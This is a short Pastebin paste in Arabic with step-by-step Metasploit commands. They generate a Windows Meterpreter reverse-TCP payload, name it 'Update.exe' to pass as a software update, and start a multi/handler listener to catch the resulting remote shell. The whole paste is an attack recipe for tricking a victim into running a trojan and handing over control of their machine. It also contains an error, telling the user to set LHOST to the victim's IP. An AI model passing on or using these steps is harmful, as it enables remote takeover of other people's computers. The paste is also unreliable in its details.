Advertisement
RedMan99

Untitled

Mar 23rd, 2014
405
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.44 KB | None | 0 0
  1.  
  2.  
  3. الخطوة الأولى :
  4.  
  5.  
  6.  
  7. إفتح ترمينال :
  8.  
  9. msfpayload windows/meterpreter/reverse_tcp LHOST=(ip) LPORT=8080 x > /root/Desktop/Update.exe
  10.  
  11.  
  12. ------------------------------------------------------------------------------------------------------------------------------
  13. إفتح ترمينال جديد :
  14.  
  15. نفتح ال-Metasploit
  16.  
  17.  
  18.  
  19. 1-msfconsole
  20. 2-use multi/handler
  21. 3-set LHOST (victim Ip)
  22. 4-set LPORT 8080
  23. 5-exploit
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement